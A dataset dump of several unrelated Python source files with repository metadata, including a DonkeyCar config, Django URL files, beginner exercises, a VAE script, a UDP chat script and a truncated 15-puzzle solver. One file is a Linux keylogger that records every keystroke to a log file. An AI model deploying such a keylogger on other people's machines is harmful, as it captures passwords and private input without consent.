blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e52d62f737d446777cfd8dea8b7693500b35f7dc
|
d81c01dcef11874b85db910e2698f0c51357d69e
|
/myconfig.py
|
947b2b5b303a0b3b15b6c1d0c53c259baa04e0be
|
[] |
no_license
|
dgwanggl/DonkeyCar20191102
|
45e2412ffef56c60fb5ddf1c1868316140ae7cd0
|
2474507247dfb6a6bfb510d4ad4258dab40c67a1
|
refs/heads/master
| 2020-09-02T09:55:08.787135
| 2019-11-03T12:51:36
| 2019-11-03T12:51:36
| 219,138,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,252
|
py
|
# """
# My CAR CONFIG
# This file is read by your car application's manage.py script to change the car
# performance
# If desired, all config overrides can be specified here.
# The update operation will not touch this file.
# """
# import os
#
# #PATHS
# CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
# DATA_PATH = os.path.join(CAR_PATH, 'data')
# MODELS_PATH = os.path.join(CAR_PATH, 'models')
#
# #VEHICLE
# DRIVE_LOOP_HZ = 20 # the vehicle loop will pause if faster than this speed.
# MAX_LOOPS = None # the vehicle loop can abort after this many iterations, when given a positive integer.
#
# #CAMERA
# CAMERA_TYPE = "PICAM" # (PICAM|WEBCAM|CVCAM|CSIC|V4L|MOCK)
# IMAGE_W = 160
# IMAGE_H = 120
# IMAGE_DEPTH = 3 # default RGB=3, make 1 for mono
# CAMERA_FRAMERATE = DRIVE_LOOP_HZ
#
# #9865, over rides only if needed, ie. TX2..
# PCA9685_I2C_ADDR = 0x40 #I2C address, use i2cdetect to validate this number
# PCA9685_I2C_BUSNUM = None #None will auto detect, which is fine on the pi. But other platforms should specify the bus num.
#
# #DRIVETRAIN
# #These options specify which chasis and motor setup you are using. Most are using SERVO_ESC.
# #DC_STEER_THROTTLE uses HBridge pwm to control one steering dc motor, and one drive wheel motor
# #DC_TWO_WHEEL uses HBridge pwm to control two drive motors, one on the left, and one on the right.
# #SERVO_HBRIDGE_PWM use ServoBlaster to output pwm control from the PiZero directly to control steering, and HBridge for a drive motor.
# DRIVE_TRAIN_TYPE = "SERVO_ESC" # SERVO_ESC|DC_STEER_THROTTLE|DC_TWO_WHEEL|SERVO_HBRIDGE_PWM
#
# #STEERING
STEERING_CHANNEL = 1 #channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 480 #pwm value for full left steering
STEERING_RIGHT_PWM = 320 #pwm value for full right steering
#
# #THROTTLE
THROTTLE_CHANNEL = 0 #channel on the 9685 pwm board 0-15
THROTTLE_FORWARD_PWM = 455 #pwm value for max forward throttle
THROTTLE_STOPPED_PWM = 400 #pwm value for no movement
THROTTLE_REVERSE_PWM = 250 #pwm value for max reverse throttle
#
# #DC_STEER_THROTTLE with one motor as steering, one as drive
# #these GPIO pinouts are only used for the DRIVE_TRAIN_TYPE=DC_STEER_THROTTLE
# HBRIDGE_PIN_LEFT = 18
# HBRIDGE_PIN_RIGHT = 16
# HBRIDGE_PIN_FWD = 15
# HBRIDGE_PIN_BWD = 13
#
# #DC_TWO_WHEEL - with two wheels as drive, left and right.
# #these GPIO pinouts are only used for the DRIVE_TRAIN_TYPE=DC_TWO_WHEEL
# HBRIDGE_PIN_LEFT_FWD = 18
# HBRIDGE_PIN_LEFT_BWD = 16
# HBRIDGE_PIN_RIGHT_FWD = 15
# HBRIDGE_PIN_RIGHT_BWD = 13
#
#
# #TRAINING
# #The DEFAULT_MODEL_TYPE will choose which model will be created at training time. This chooses
# #between different neural network designs. You can override this setting by passing the command
# #line parameter --type to the python manage.py train and drive commands.
# DEFAULT_MODEL_TYPE = 'linear' #(linear|categorical|rnn|imu|behavior|3d|localizer|latent)
# BATCH_SIZE = 128 #how many records to use when doing one pass of gradient decent. Use a smaller number if your gpu is running out of memory.
# TRAIN_TEST_SPLIT = 0.8 #what percent of records to use for training. the remaining used for validation.
# MAX_EPOCHS = 100 #how many times to visit all records of your data
# SHOW_PLOT = True #would you like to see a pop up display of final loss?
# VEBOSE_TRAIN = True #would you like to see a progress bar with text during training?
# USE_EARLY_STOP = True #would you like to stop the training if we see it's not improving fit?
# EARLY_STOP_PATIENCE = 5 #how many epochs to wait before no improvement
# MIN_DELTA = .0005 #early stop will want this much loss change before calling it improved.
# PRINT_MODEL_SUMMARY = True #print layers and weights to stdout
# OPTIMIZER = None #adam, sgd, rmsprop, etc.. None accepts default
# LEARNING_RATE = 0.001 #only used when OPTIMIZER specified
# LEARNING_RATE_DECAY = 0.0 #only used when OPTIMIZER specified
# SEND_BEST_MODEL_TO_PI = False #change to true to automatically send best model during training
# CACHE_IMAGES = True #keep images in memory. will speed succesive epochs, but crater if not enough mem.
#
# PRUNE_CNN = False #This will remove weights from your model. The primary goal is to increase performance.
# PRUNE_PERCENT_TARGET = 75 # The desired percentage of pruning.
# PRUNE_PERCENT_PER_ITERATION = 20 # Percenge of pruning that is perform per iteration.
# PRUNE_VAL_LOSS_DEGRADATION_LIMIT = 0.2 # The max amout of validation loss that is permitted during pruning.
# PRUNE_EVAL_PERCENT_OF_DATASET = .05 # percent of dataset used to perform evaluation of model.
#
# #Pi login information
# #When using the continuous train option, these credentials will
# #be used to copy the final model to your vehicle. If not using this option, no need to set these.
# PI_USERNAME = "pi" # username on pi
# PI_PASSWD = "raspberry" # password is optional. Only used from Windows machine. Ubuntu and mac users should copy their public keys to the pi. `ssh-copy-id username@hostname`
# PI_HOSTNAME = "raspberrypi.local" # the network hostname or ip address
# PI_DONKEY_ROOT = "/home/pi/mycar" # the location of the mycar dir on the pi. this will be used to help locate the final model destination.
#
# # Region of interst cropping
# # only supported in Categorical and Linear models.
# # If these crops values are too large, they will cause the stride values to become negative and the model with not be valid.
# ROI_CROP_TOP = 0 #the number of rows of pixels to ignore on the top of the image
# ROI_CROP_BOTTOM = 0 #the number of rows of pixels to ignore on the bottom of the image
#
# #Model transfer options
# #When copying weights during a model transfer operation, should we freeze a certain number of layers
# #to the incoming weights and not allow them to change during training?
# FREEZE_LAYERS = False #default False will allow all layers to be modified by training
# NUM_LAST_LAYERS_TO_TRAIN = 7 #when freezing layers, how many layers from the last should be allowed to train?
#
#
# #JOYSTICK
# USE_JOYSTICK_AS_DEFAULT = False #when starting the manage.py, when True, will not require a --js option to use the joystick
# JOYSTICK_MAX_THROTTLE = 0.5 #this scalar is multiplied with the -1 to 1 throttle value to limit the maximum throttle. This can help if you drop the controller or just don't need the full speed available.
# JOYSTICK_STEERING_SCALE = 1.0 #some people want a steering that is less sensitve. This scalar is multiplied with the steering -1 to 1. It can be negative to reverse dir.
# AUTO_RECORD_ON_THROTTLE = True #if true, we will record whenever throttle is not zero. if false, you must manually toggle recording with some other trigger. Usually circle button on joystick.
# CONTROLLER_TYPE='ps3' #(ps3|ps4|xbox|nimbus|wiiu|F710)
# USE_NETWORKED_JS = False #should we listen for remote joystick control over the network?
# NETWORK_JS_SERVER_IP = "192.168.0.1"#when listening for network joystick control, which ip is serving this information
# JOYSTICK_DEADZONE = 0.0 # when non zero, this is the smallest throttle before recording triggered.
# JOYSTICK_THROTTLE_DIR = -1.0 # use -1.0 to flip forward/backward, use 1.0 to use joystick's natural forward/backward
#
# #For the categorical model, this limits the upper bound of the learned throttle
# #it's very IMPORTANT that this value is matched from the training PC config.py and the robot.py
# #and ideally wouldn't change once set.
# MODEL_CATEGORICAL_MAX_THROTTLE_RANGE = 0.5
#
# #RNN or 3D
# SEQUENCE_LENGTH = 3 #some models use a number of images over time. This controls how many.
#
# #IMU
# HAVE_IMU = False #when true, this add a Mpu6050 part and records the data. Can be used with a
#
# #SOMBRERO
# HAVE_SOMBRERO = False #set to true when using the sombrero hat from the Donkeycar store. This will enable pwm on the hat.
#
# #RECORD OPTIONS
# RECORD_DURING_AI = False #normally we do not record during ai mode. Set this to true to get image and steering records for your Ai. Be careful not to use them to train.
#
# #LED
# HAVE_RGB_LED = False #do you have an RGB LED like https://www.amazon.com/dp/B07BNRZWNF
# LED_INVERT = False #COMMON ANODE? Some RGB LED use common anode. like https://www.amazon.com/Xia-Fly-Tri-Color-Emitting-Diffused/dp/B07MYJQP8B
#
# #LED board pin number for pwm outputs
# #These are physical pinouts. See: https://www.raspberrypi-spy.co.uk/2012/06/simple-guide-to-the-rpi-gpio-header-and-pins/
# LED_PIN_R = 12
# LED_PIN_G = 10
# LED_PIN_B = 16
#
# #LED status color, 0-100
# LED_R = 0
# LED_G = 0
# LED_B = 1
#
# #LED Color for record count indicator
# REC_COUNT_ALERT = 1000 #how many records before blinking alert
# REC_COUNT_ALERT_CYC = 15 #how many cycles of 1/20 of a second to blink per REC_COUNT_ALERT records
# REC_COUNT_ALERT_BLINK_RATE = 0.4 #how fast to blink the led in seconds on/off
#
# #first number is record count, second tuple is color ( r, g, b) (0-100)
# #when record count exceeds that number, the color will be used
# RECORD_ALERT_COLOR_ARR = [ (0, (1, 1, 1)),
# (3000, (5, 5, 5)),
# (5000, (5, 2, 0)),
# (10000, (0, 5, 0)),
# (15000, (0, 5, 5)),
# (20000, (0, 0, 5)), ]
#
#
# #LED status color, 0-100, for model reloaded alert
# MODEL_RELOADED_LED_R = 100
# MODEL_RELOADED_LED_G = 0
# MODEL_RELOADED_LED_B = 0
#
#
# #BEHAVIORS
# #When training the Behavioral Neural Network model, make a list of the behaviors,
# #Set the TRAIN_BEHAVIORS = True, and use the BEHAVIOR_LED_COLORS to give each behavior a color
# TRAIN_BEHAVIORS = False
# BEHAVIOR_LIST = ['Left_Lane', "Right_Lane"]
# BEHAVIOR_LED_COLORS =[ (0, 10, 0), (10, 0, 0) ] #RGB tuples 0-100 per chanel
#
# #Localizer
# #The localizer is a neural network that can learn to predice it's location on the track.
# #This is an experimental feature that needs more developement. But it can currently be used
# #to predict the segement of the course, where the course is divided into NUM_LOCATIONS segments.
# TRAIN_LOCALIZER = False
# NUM_LOCATIONS = 10
# BUTTON_PRESS_NEW_TUB = False #when enabled, makes it easier to divide our data into one tub per track length if we make a new tub on each X button press.
#
# #DonkeyGym
# #Only on Ubuntu linux, you can use the simulator as a virtual donkey and
# #issue the same python manage.py drive command as usual, but have them control a virtual car.
# #This enables that, and sets the path to the simualator and the environment.
# #You will want to download the simulator binary from: https://github.com/tawnkramer/donkey_gym/releases/download/v18.9/DonkeySimLinux.zip
# #then extract that and modify DONKEY_SIM_PATH.
# DONKEY_GYM = False
# DONKEY_SIM_PATH = "path to sim" #"/home/tkramer/projects/sdsandbox/sdsim/build/DonkeySimLinux/donkey_sim.x86_64"
# DONKEY_GYM_ENV_NAME = "donkey-generated-track-v0" # ("donkey-generated-track-v0"|"donkey-generated-roads-v0"|"donkey-warehouse-v0"|"donkey-avc-sparkfun-v0")
#
# #publish camera over network
# #This is used to create a tcp service to pushlish the camera feed
# PUB_CAMERA_IMAGES = False
#
# #When racing, to give the ai a boost, configure these values.
# AI_LAUNCH_DURATION = 0.0 # the ai will output throttle for this many seconds
# AI_LAUNCH_THROTTLE = 0.0 # the ai will output this throttle value
# AI_LAUNCH_ENABLE_BUTTON = 'R2' # this keypress will enable this boost. It must be enabled before each use to prevent accidental trigger.
# AI_LAUNCH_KEEP_ENABLED = False # when False ( default) you will need to hit the AI_LAUNCH_ENABLE_BUTTON for each use. This is safest. When this True, is active on each trip into "local" ai mode.
#
# #Scale the output of the throttle of the ai pilot for all model types.
# AI_THROTTLE_MULT = 1.0 # this multiplier will scale every throttle value for all output from NN models
#
# #Path following
# PATH_FILENAME = "donkey_path.pkl" #the path will be saved to this filename
# PATH_SCALE = 5.0 # the path display will be scaled by this factor in the web page
# PATH_OFFSET = (0, 0) # 255, 255 is the center of the map. This offset controls where the origin is displayed.
# PATH_MIN_DIST = 0.3 # after travelling this distance (m), save a path point
# PID_P = -10.0 # proportional mult for PID path follower
# PID_I = 0.000 # integral mult for PID path follower
# PID_D = -0.2 # differential mult for PID path follower
# PID_THROTTLE = 0.2 # constant throttle value during path following
# SAVE_PATH_BTN = "cross" # joystick button to save path
# RESET_ORIGIN_BTN = "triangle" # joystick button to press to move car back to origin
|
[
"dgwang@gl.ck.tp.edu.tw"
] |
dgwang@gl.ck.tp.edu.tw
|
eecb83724e5947e68b51319cfa58e6fba11d101d
|
26bd189f367f43dcea8d64ad208015af5c74f7a3
|
/catkin_ws/build/rosaria/catkin_generated/pkg.develspace.context.pc.py
|
fc6de52f91947c5d87edc48832415349fa2e7153
|
[] |
no_license
|
RHaghighi/ROS-Workspace
|
2c19b9227d5374f1656ef13e859b16a06abbf64b
|
5d1f97f850cbc1db3f91c8ec939074da727ea35e
|
refs/heads/master
| 2021-01-21T23:08:41.525072
| 2017-06-23T07:11:42
| 2017-06-23T07:11:42
| 95,192,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/reza/catkin_ws/devel/include".split(';') if "/home/reza/catkin_ws/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;nav_msgs;geometry_msgs;sensor_msgs;tf".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosaria"
PROJECT_SPACE_DIR = "/home/reza/catkin_ws/devel"
PROJECT_VERSION = "0.9.0"
|
[
"reza0007@e.ntu.edu.sg"
] |
reza0007@e.ntu.edu.sg
|
da3014c5f84dce1763f097a4906eca9d63763ba6
|
01d1dcb25662aca00eae607604202c579def987d
|
/aula01.py
|
484a415fd860ba825e395e3c35a3d87199a4ca92
|
[] |
no_license
|
RebeccaMariahDEV/luiza_labs_python
|
ad1f24f557b62303cff28362c2973739f3cecb30
|
5a4279172ef2e73b6cfdb7c21d42b35fa8f190c2
|
refs/heads/main
| 2023-03-07T06:01:33.642736
| 2021-02-16T21:45:59
| 2021-02-16T21:45:59
| 339,523,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,342
|
py
|
"""
nome = input("Olá, qual o seu nome?\n")
idade = int(input(f"Prazer {nome}, sou o robô Becca, qual a sua idade?\n"))
robo_idade = 107
robo_idade = robo_idade - idade
print(f"Eu sou {robo_idade} anos mais velha que vc")
nome = input("Olá, qual seu nume?\n")
ano = input("Esta em qual ano da escola?\n")
print("Digite suas ultimas notas de matematica")
notas1 = float(input("primeira nota:\n"))
notas2 = float(input("Segunda nota:\n"))
notas3 = float(input("terceira nota:\n"))
resultado = (notas1 + notas2 + notas3) / 3
print(f"Sua media é: {resultado}")
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 3) == 0:
print("Dedezinho")
else:
print(num)
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 5) == 0:
print("Linda")
else:
print(num)
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 5) == 0 and (num % 3 ) == 0:
print("Dedezinha linda")
else:
print(num)
for num in '95876234585':
num = int(num)
if num ==4:
print('sou 2 +2')
elif num <= 3:
print("Sou pequeno")
else:
if num == 5:
num += num
print(f'5 não, sou {num}')
else:
print(num)
import random
for sorteio in range(5):
num_sorte = random.randint(10,50)
print(num_sorte)
from random import randint
nome = input('Qual o seu nome: ')
print(f'Olá {nome}, pense em um número de 1 a 20.')
for sorteio in range(1,7):
num = randint(1,20)
num1 = int(input('Consegue adivinhar? '))
if num1 == num:
print(f"Parabéns! Você acertou, número foi {num1}")
print('FIM!')
elif num1 > num:
print('OPS! digitou um número maior')
else:
print('OPS! digitou um número menor')
"""
from random import randint
nome = input('Qual o seu nome: ')
print(f'Olá {nome}, pense em um número de 1 a 20.')
for sorteio in range(1, 7):
num = randint(1, 20)
num1 = int(input('Consegue adivinhar? '))
if num1 == num:
print(f"Parabéns! Você acertou, número foi {num1}")
print('FIM!')
elif num1 > num:
print('OPS! digitou um número maior')
else:
print('OPS! digitou um número menor')
|
[
"noreply@github.com"
] |
RebeccaMariahDEV.noreply@github.com
|
9395f134fddab16f059972a1fc5919e91497138f
|
cb07b2de235ce781066c33237e4c2f3ae898eeae
|
/check_latent_disentangle.py
|
5852d795f24cd77f5bd83d91970e666d126e4efe
|
[] |
no_license
|
lchingen/vae
|
936fadf0786002d4b5e222f980c12d8b56cfbddf
|
52da036ed6ae7ba9a5eb7afc4bc334227287643f
|
refs/heads/master
| 2020-04-16T21:49:21.432578
| 2020-01-14T00:55:56
| 2020-01-14T00:55:56
| 165,941,496
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,984
|
py
|
import numpy as np
import tensorflow as tf
from tensorflow.contrib import predictor
from pathlib import Path
from matplotlib.pyplot import plot as plt
from config import *
from helper import *
from utils import *
from model_fn import *
def shift(m_in, offset=0, dir='lr'):
# Generate permutation matrix
p = np.eye(m_in.shape[0])
p = np.roll(p, offset, axis=0).astype('int')
# Horizontal shift (left/right = +/- offset)
if dir == 'lr':
m_in = np.transpose(m_in, (2, 0, 1))
x = np.matmul(m_in, p)
return np.transpose(x, (1, 2, 0)).astype('uint8')
# Vertical shift (down/up = +/- offset)
if dir == 'ud':
x = np.matmul(m_in.T, p).T
return x.astype('uint8')
def plot_lines(data):
fig = plt.figure()
ax = plt.axes()
x = np.linspace(0, len(data)-1, len(data[0]))
for ii in range(data.shape[0]):
ax.plot(x, data[ii])
plt.show()
def main(unused_argv):
# Export model_fn to only use decoder
export_tf_model(FLAGS.export_path)
# Find latest frozen pb
subdirs = [x for x in Path(FLAGS.export_path + '/frozen_pb').iterdir()
if x.is_dir() and 'temp' not in str(x)]
latest = str(sorted(subdirs)[-1])
# Create predictor
predict_fn = predictor.from_saved_model(latest)
# Read image
x = load_img('./imgs/end.jpg')
x_shift = shift(x, offset=5, dir='lr')
x = x[None, ...] /255.0
x_shift = x_shift[None, ...] /255.0
x_val = np.vstack((x, x_shift))
dict_in = {'x': x_val, 'z': np.zeros(z_dim)[None]}
# Make predictions and fetch results from output dict
z = predict_fn(dict_in)['mu']
plot_lines(z)
#z_shift = np.roll(z, 20, axis = 1)
#z_val = np.vstack((z, z_shift))
#dict_in = {'x': np.zeros(input_dim)[None], 'z': z_val}
#y, y_shift = predict_fn(dict_in)['y']
#compare(y, y_shift)
if __name__ == '__main__':
tf.app.flags.DEFINE_string('mode', None, 'TRAIN/TEST')
tf.app.run()
|
[
"lchingen@umich.edu"
] |
lchingen@umich.edu
|
0c7290843c9f8d6897b2f1b76ea235028e543e27
|
d101eb3cd3278862bf6905c1e8609083998658ca
|
/blogprojectt/urls.py
|
21364890b2aaded673188fcc35d4b89a71b20633
|
[] |
no_license
|
ae129/8-12-
|
ad5d04efbd3e8fd2c0790b66bfa42d6a9467ef19
|
07ff9d30440a0568194fa74119efeb165acc4978
|
refs/heads/master
| 2022-11-30T04:52:28.723740
| 2020-08-12T06:46:12
| 2020-08-12T06:46:12
| 286,939,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
"""blogproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import blogapp.views
urlpatterns = [
path('admin/', admin.site.urls),
path('',blogapp.views.home, name="home"),
]
|
[
"ae129@likelion.org"
] |
ae129@likelion.org
|
5b6d751d75236b022dcbd6d4b0dd04f439e67320
|
e834ff12cb1dc086057496147ad15fe272b2f592
|
/chainerio/__init__.py
|
b7d5e441be78df1990177c978cfdeecdb65755a1
|
[
"MIT"
] |
permissive
|
msakai/pfio
|
6d65d64e2d6a607e7709b8d6ec92352aef0695ec
|
29e5c6d6b15d33c7e7e468b42c58d24dae3d8cad
|
refs/heads/master
| 2022-10-13T13:52:29.229337
| 2020-06-08T07:11:18
| 2020-06-08T07:11:18
| 267,463,856
| 0
| 0
|
MIT
| 2020-05-28T01:27:16
| 2020-05-28T01:27:15
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
import sys
# make sure pfio is in sys.modules
import pfio # NOQA
sys.modules[__name__] = __import__('pfio')
|
[
"tianqi@preferred.jp"
] |
tianqi@preferred.jp
|
88f030ed4549f41fed34303dd53903c61e595dd0
|
f768ddba19c7bc7664ae581daeef5fe2f650a539
|
/leetcode/engineer.py
|
b3011086b8f515a4bc54c41902609a4cfd17af7e
|
[] |
no_license
|
douwings/pythonWork
|
36ac2ba32a721ed6d9af62a9168eee12a61891af
|
70f84eb179e12cc36b521fdb9a2573a14a300d23
|
refs/heads/master
| 2022-12-23T18:41:50.560391
| 2020-09-28T06:20:36
| 2020-09-28T06:20:36
| 273,136,705
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 255
|
py
|
class Solution:
def maxPerformance(self, n, speed, efficiency, k) -> int:
return 123
if __name__ == '__main__':
solution = Solution()
print(solution.maxPerformance(n=6, speed=[2, 10, 3, 1, 5, 8], efficiency=[5, 4, 3, 9, 7, 2], k=2))
|
[
"1020763068@qq.com"
] |
1020763068@qq.com
|
de8ef67ffbc4f74884821c563da1435f68295fda
|
2157782cf5875767f8d1fe0bb07243da2e87600d
|
/test_from_myself/djangoTest/helloworld/helloworld/urls.py
|
42b5c79e380185708b4639f06d761c36e10fa6c8
|
[] |
no_license
|
mouday/SomeCodeForPython
|
9bc79e40ed9ed851ac11ff6144ea080020e01fcd
|
ddf6bbd8a5bd78f90437ffa718ab7f17faf3c34b
|
refs/heads/master
| 2021-05-09T22:24:47.394175
| 2018-05-11T15:34:22
| 2018-05-11T15:34:22
| 118,750,143
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,267
|
py
|
"""helloworld URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url
from django.urls import path
from . import views
from . import testdb
from . import search
urlpatterns = [
path('admin/', admin.site.urls),
url('^hello$', views.hello),
url('^sayhello$', views.sayhello),
url('^label$', views.label),
url('^child$', views.child),
url('^insertdb$', testdb.insertdb),
url('^getbd$', testdb.getdb),
url('^updatedb$', testdb.updatedb),
url('^deletedb$', testdb.deletedb),
url('^search$', search.search),
url('^search_form$', search.search_form),
url('^search-post$', search.search_post),
]
|
[
"1940607002@qq.com"
] |
1940607002@qq.com
|
ec944faf2da82dbef93beb5986cc59efed81baf4
|
504d1c5701b9bf04c86e40eebefe75e620f68852
|
/linux/keylogger/keylogger.py
|
e1f70c0290845ba7576fb5fe82b89ee9ad217dda
|
[
"MIT"
] |
permissive
|
jackzhp/Keylogger
|
524ccc421c569ff959dd43c9bf3b982c0f1304ea
|
8d0377a7f571a105351618d03e4670d8a1702c69
|
refs/heads/master
| 2021-03-30T02:28:19.309392
| 2021-02-16T02:16:00
| 2021-02-16T02:16:00
| 248,006,796
| 0
| 0
|
MIT
| 2020-03-17T15:34:14
| 2020-03-17T15:34:13
| null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/env python
import os
from argparse import ArgumentParser
from datetime import datetime
from keylogger import pyxhook
def main():
ts = datetime.now().strftime("%d-%m-%Y_%H:%M:%S")
parser = ArgumentParser(description='A simple keylogger for Linux.')
parser.add_argument(
'--log-file',
default=os.path.join(os.getcwd(), 'keys-' + str(ts) + '.log'),
help='Save the output in this file.',
)
parser.add_argument(
'--clean-file',
action='store_true',
default=False,
help='Clear the log file on startup.Default is No',
)
parser.add_argument(
'--cancel-key',
help='A single key that use as the cancel key, Default is ` (backtick)',
)
args = parser.parse_args()
log_file = args.log_file
if args.clean_file:
try:
os.remove(log_file)
except OSError:
# TODO: log with logging module
pass
cancel_key = args.cancel_key[0] if args.cancel_key else '`'
def OnKeyPress(event):
with open(log_file, 'a') as f:
f.write('{}\n'.format(event.Key))
if event.Ascii == cancel_key:
new_hook.cancel()
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
new_hook.HookKeyboard()
try:
new_hook.start()
except KeyboardInterrupt:
# User cancelled from command line.
pass
except Exception as ex:
# Write exceptions to the log file, for analysis later.
msg = 'Error while catching events:\n {}'.format(ex)
pyxhook.print_err(msg)
with open(log_file, 'a') as f:
f.write('\n{}'.format(msg))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
jackzhp.noreply@github.com
|
4eb0ba253951459b3ec638970f1e653ab9f61577
|
0393d550fbdc08259ccdfd843215a01443fb4af2
|
/Web/WEBoutput.py
|
9d7a5d9075b52d95b299434f0859ee5fbf9919bf
|
[] |
no_license
|
lmingari/lidar_SMN
|
e8b17a33b8fc77d549b219c4f56edc23afdea0d0
|
52293ece21048424e1cb265f6220f6859b608ae9
|
refs/heads/master
| 2021-04-09T14:34:27.708556
| 2019-05-02T13:08:21
| 2019-05-02T13:08:21
| 125,753,349
| 0
| 1
| null | 2019-05-02T11:21:22
| 2018-03-18T18:06:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
from IOweb import lidar2js, connect_ftp, upload_file
from os.path import isfile, join
import jinja2
fname_template_intramet = "/home/lmingari/lidar_v2.1/Web/template_intramet.html"
fname_template_mireta = "/home/lmingari/lidar_v2.1/Web/template_mireta.html"
st_name = {'comodoro': "Comodoro Rivdavia station",
'bariloche': "Bariloche station",
'aeroparque': "Aeroparque station",
'parenas': "Punta Arenas station",
'neuquen': "Neuquen station",
'vmartelli': "Villa Martelli station",
'cordoba': "Cordoba station",
}
def CreateJS(block, ncpath, ncfile):
fname_js = "{}.js".format(block)
fname_html = "{}.html".format(block)
tag = {'title': "Lidar - Interactive visualization"}
tag['header'] = st_name[block]
tag["block"] = lidar2js( ncpath,ncfile,fname_js )
with open(fname_template_intramet, 'r') as f:
html_data = f.read()
template_html=jinja2.Template(html_data)
with open(join(ncpath, fname_html), 'w') as f:
html_out = template_html.render(tag)
id_number = html_out.split("id=")[1].split('"')[1]
f.write(html_out.replace(fname_js,"{}?ver={}".format(fname_js,id_number)))
with open(fname_template_mireta, 'r') as f:
html_data = f.read()
fname_html = "{}_b.html".format(block)
template_html=jinja2.Template(html_data)
with open(join(ncpath, fname_html), 'w') as f:
f.write(template_html.render(tag))
|
[
"lmingari@gmail.com"
] |
lmingari@gmail.com
|
866a1e1376f7edd8fd9593aebce114615de4cd1d
|
353b36f50b9bacef8ab79c263ca60bd5d7f8fda3
|
/newsen
|
19c9f9a5a893fea490be75fc898d8eceda1eee26
|
[] |
no_license
|
navratansingh/nav
|
57186b1427b040d0d4928d848f8d40aabcd8981e
|
a10e344f9da23af9b0c91a67839ddfe66f1a5618
|
refs/heads/master
| 2020-03-17T01:13:59.542196
| 2018-05-19T11:53:12
| 2018-05-19T11:53:12
| 133,144,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
#!/usr/bin/python2
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
message=raw_input("navratan")
s.sendto(message,("192.168.10.68",9333))
while 5:
message=raw_input("navratan")
n = s.recvfrom(5000)
print n[0]
s.sendto(message,("192.168.10.68",n[1][1]))
#s.bind((n[1][0],n[1][1]))
|
[
"navratan1331@gmail.com"
] |
navratan1331@gmail.com
|
|
9f96ceedd369c3d2a189cc8b0e9e20634e0b3d00
|
821051afcf93e84b8411c9486b4534fe8462538a
|
/solver.py
|
1595efbc6ea163a336a1f7caf667219d94647d9c
|
[] |
no_license
|
lw-git/Game_15
|
539f826bb1cc42aaf9e4db0f5084ab2e82f19d44
|
93f5af3d05afba52cd6e7012adf5bc73bf069f3d
|
refs/heads/master
| 2022-12-19T08:25:51.921631
| 2020-09-06T06:55:12
| 2020-09-06T06:55:12
| 281,867,523
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,116
|
py
|
# https://codegolf.stackexchange.com/questions/6884/solve-the-15-puzzle-the-tile-sliding-puzzle
class IDAStar:
def __init__(self, h, neighbours):
self.h = h
self.neighbours = neighbours
self.FOUND = object()
def solve(self, root, is_goal, max_cost=None):
self.is_goal = is_goal
self.path = [root]
self.is_in_path = {root}
self.path_descrs = []
self.nodes_evaluated = 0
